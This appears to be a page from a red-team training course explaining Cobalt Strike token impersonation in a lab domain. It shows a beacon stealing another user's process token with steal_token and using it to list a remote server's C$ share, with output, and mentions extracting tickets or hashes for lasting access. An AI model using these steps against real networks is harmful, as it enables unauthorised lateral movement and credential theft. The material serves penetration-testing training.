Token Impersonation
We have already seen an example of using Cobalt Strike's steal_token command in the context of overpass the hash. However, if we elevate or land on a system where a user is running a process, we can impersonate its token without having to jump through additional hoops.
If we list the running processes on Workstation 2 from an elevated prompt, we see that jking is running an instance of mmc.exe.
PID PPID Name Arch Session User
--- ---- ---- ---- ------- ----
4464 392 mmc.exe x64 0 DEV\jking\
We can simply steal its token and access a target.
beacon> steal_token 4464
beacon> ls \\web.dev.cyberbotic.io\c$
[*] Listing: \\web.dev.cyberbotic.io\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2022 18:50:13 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 08/15/2022 18:58:09 inetpub
dir 05/08/2021 08:20:24 PerfLogs
dir 08/24/2022 11:02:25 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 08/31/2022 17:40:32 ProgramData
dir 08/15/2022 18:31:08 Recovery
dir 08/30/2022 11:16:24 System Volume Information
dir 08/30/2022 17:51:08 Users
dir 08/30/2022 20:19:27 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
12kb fil 09/01/2022 07:26:41 DumpStack.log.tmp
384mb fil 09/01/2022 07:26:41 pagefile.sys\
The obvious downside is that if the user closes the process, our ability to abuse it goes away. By taking the additional steps of extracting tickets or hashes, we provide ourselves a more guaranteed or "future-proof" way of leveraging the credential material.
Last updated